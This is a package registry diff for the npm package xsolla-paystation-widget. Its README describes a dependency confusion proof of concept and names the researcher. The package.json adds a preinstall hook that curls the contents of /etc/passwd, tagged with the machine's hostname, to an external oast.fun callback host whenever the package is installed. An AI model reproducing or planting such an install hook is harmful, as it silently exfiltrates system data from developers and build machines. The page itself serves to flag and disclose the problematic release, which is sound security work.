xsolla-paystation-widget 0.0.1-security → 4.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of xsolla-paystation-widget might be problematic. Click here for more details.
- package/README.md +3 -5
- package/package.json +9 -3
package/README.md
CHANGED
|
@@ -1,5 +1,3 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=xsolla-paystation-widget for more information.
|
|
1
|
+
<h1 align="center">This NPM package is vulnerable to dependency confusion attacks</h1>
|
|
2
|
+
<p align="center">Name: Vikas Anand</p>
|
|
3
|
+
<p align="center">Contact: kingcoolvikas@intigriti.me</p>
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "xsolla-paystation-widget",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "4.0.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).cmp2pe12vtc0000w6e8ggkmbt4wyyyyyn.oast.fun"
|
|
9
|
+
},
|
|
10
|
+
"author": "",
|
|
11
|
+
"license": "ISC"
|
|
6
12
|
}
|